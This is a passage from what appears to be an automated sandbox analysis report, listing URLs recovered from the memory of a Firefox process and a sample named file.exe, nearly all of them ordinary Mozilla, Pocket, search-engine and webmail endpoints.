Source: firefox.exe, 0000001F.00000003.2916313880.000001B112C00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916533692.000001B112E1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2984824415.000001B1161D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916983014.000001B112E5F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001F.00000002.3024126644.00002E551AD00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?Zy
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2123124087.00000000027DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/FileUtils.sys.mjsScheme
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2988472196.000001B1166E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 0000001F.00000002.2977902374.000001B1153F0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/initMouseEvent()
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 0000001F.00000002.3014298183.000001B11C458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001F.00000002.2977814930.000001B1153C0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordshttps
Source: firefox.exe, 0000001F.00000002.3024586000.00003E9C36B3A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2962205193.000001B1110E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001F.00000002.2975520738.000001B115003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001F.00000003.2939661646.000001B11E0F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.ts
Source: firefox.exe, 0000001F.00000003.2939661646.000001B11E0F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query.ts
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001F.00000003.2916313880.000001B112C00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916533692.000001B112E1C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2916983014.000001B112E5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2959421322.000001B106A00000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotsshims/google-analytics-ecommerce-plugin.jsextension/d
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 0000001F.00000002.2954167196.000001B106621000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 0000001F.00000002.2953298471.000001B104803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 0000001F.00000002.2955694353.000001B106740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 0000001F.00000002.3006356102.000001B11BFBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001F.00000003.2938950464.000001B11E09C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2939661646.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000003.2940678415.000001B11E0A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001F.00000002.2962205193.000001B11107F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2977960842.000001B115408000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com
Source: firefox.exe, 0000001F.00000002.2977960842.000001B115408000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 0000001F.00000002.2977960842.000001B115431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2969238159.000001B112DCB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2964737783.000001B111ABA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s_injectDefaultProtocolHandlersIfNeeded
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://poczta.interia.pl/mh/?mailto=%sget
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 0000001F.00000002.2970664695.000001B1136C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2970664695.000001B113680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 0000001F.00000002.3023337743.00000CB01CC04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2974564214.000001B114F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963021945.000001B11157D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sunavailable:FEATURE_FAILURE_DCOMP_NOT_ANGLEgetOriginAttribute
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114DC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001F.00000002.2972528823.000001B114D7A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111B7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comprofilerRecordingButtonCreated
Source: firefox.exe, 0000001F.00000002.3016689132.000001B11D682000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001F.00000002.2965917115.000001B111BDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001F.00000002.2967668979.000001B112900000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
